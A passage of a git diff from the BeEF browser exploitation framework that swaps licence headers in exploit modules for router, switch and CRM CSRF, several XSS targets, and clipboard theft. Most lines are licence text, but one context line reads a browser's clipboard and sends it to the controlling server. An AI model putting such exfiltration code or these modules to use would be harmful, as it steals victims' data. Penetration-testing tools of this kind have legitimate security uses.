-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
index 83599490c..c815843ac 100644
--- a/modules/exploits/router/virgin_superhub_csrf/module.rb
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Virgin_superhub_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
index 00804c652..cf4e73799 100644
--- a/modules/exploits/spring_framework_malicious_jar/command.js
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	jar_file        = "<%= @jar_file %>";
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
index b898a24f2..c47fe917d 100644
--- a/modules/exploits/spring_framework_malicious_jar/config.yaml
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
index f1777b7f5..81fb3e9c8 100644
--- a/modules/exploits/spring_framework_malicious_jar/module.rb
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Spring_framework_malicious_jar < BeEF::Core::Command
 
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js
index a2f13c118..d812993dc 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/command.js
+++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>';
   var oldpassword = '<%= @oldpassword %>';
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 6402686d4..6d363e279 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
index e4ca0a105..0dda11a2b 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb
+++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Netgear_gs108t_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js
index f95758eb6..4702ad6df 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/command.js
+++ b/modules/exploits/vtiger_crm_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // VtigerCRM <= 5.0.4 "chained exploitation" PoC 
 // Hacked up for OWASP New Zealand Day, July 13th 2009
 //
diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
index 1f10055aa..470e0f742 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb
index ad2d6f0bc..16483715b 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/module.rb
+++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Vtiger_crm_upload_exploit < BeEF::Core::Command
   
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 6a942ff85..562181c00 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index 1832d8a16..5f5a8926a 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
index abcf44b8c..9070c0f95 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Alienvault_ossim_3_1_xss < BeEF::Core::Command
 
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index 81933f79a..ff643b786 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index 9272039db..8ad1a6ccc 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
index f0e42f7df..75b55ba40 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cisco_collaboration_server_5_xss < BeEF::Core::Command
 
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index a20ff5bbb..71c8bf1c4 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 58cc51e18..472bab376 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
index cf46a83d1..fd4b1afdc 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Serendipity_1_6_xss < BeEF::Core::Command
 
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
index 9650a2684..8727f8bc8 100644
--- a/modules/exploits/zenoss_add_user_csrf/command.js
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>'; 
   var user_level = '<%= @user_level %>';
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index 8dd39d022..458e0c701 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
index 28fac6d60..37eee8336 100644
--- a/modules/exploits/zenoss_add_user_csrf/module.rb
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Zenoss_add_user_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
index 4b753f8ea..0ef85cdce 100644
--- a/modules/exploits/zenoss_daemon_csrf/command.js
+++ b/modules/exploits/zenoss_daemon_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>'; 
   var service = '<%= @service %>';
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
index 0d474f6f0..d3871c1d6 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
index 148f0c6bf..d0e9c9693 100644
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ b/modules/exploits/zenoss_daemon_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Zenoss_daemon_csrf < BeEF::Core::Command
   
diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js
index 1c717da87..1f4db5740 100644
--- a/modules/host/clipboard_theft/command.js
+++ b/modules/host/clipboard_theft/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 		if (clipboardData.getData("Text") !== null) {
 			beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text"));
diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml
index ec30fcb28..b0f618fce 100644
--- a/modules/host/clipboard_theft/config.yaml
+++ b/modules/host/clipboard_theft/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb
index 75274ab32..daa5e6ac5 100644
--- a/modules/host/clipboard_theft/module.rb
+++ b/modules/host/clipboard_theft/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Clipboard_theft < BeEF::Core::Command
   
diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js
index e05d44658..a2608dc7d 100644
--- a/modules/host/detect_cups/command.js
+++ b/modules/host/detect_cups/command.js
